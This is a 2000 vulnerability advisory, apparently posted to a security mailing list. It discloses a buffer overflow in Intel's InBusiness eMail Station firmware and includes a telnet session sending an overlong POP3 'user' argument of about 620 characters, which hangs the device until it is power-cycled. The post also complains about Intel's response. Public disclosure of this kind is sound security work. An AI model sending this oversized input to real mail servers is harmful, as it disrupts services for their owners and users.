DoS in Intel corporation 'InBusiness eMail Station'

[Knud Erik Højgaard - CyberCity Support <knud () CYBERCITY DK>]

Intel corporation 'InBusiness eMail Station' firmware version 1.04.87
(latest) Denial of service vulnerability.

Vendor notification date: 20/10-2000
Public notification date: 20/10-2000

Problem: I found a buffer overflow in the Intel InBusiness eMail Station,
which
can enable an attacker to execute a denial of service attack against it.

Disclaimer: For educational purposes only.

example :
[foo@bar]$ telnet mailstation 110
Trying mailstation...
Connected to mailstation.
Escape character is '^]'.
+OK Pop server at mailstation starting. <2831812.972049732@mail>
user [buffer]

where [buffer] is appx. 620 chars of your own choice.(tried A and %, expect
all to work)

Symptoms: The box(a nice little piece of hardware with built-in harddrive
and all) will stop responding, and needs a power cycle to restore function.

Reason for posting same date as vendor notification:  Intel was contacted
and informed of the bug, and all they had to say was "You're using it in a
way its not supposed to be used" (i told them it was on a leased line) - in
their opinion it doesn't matter since its possible to connect a modem to it,
and use it for retrieving mail and distributing it locally.


Sincerely (and a big thanks to Intel for not caring about product security
at all)

Knud Erik Højgaard <kain () perker dk>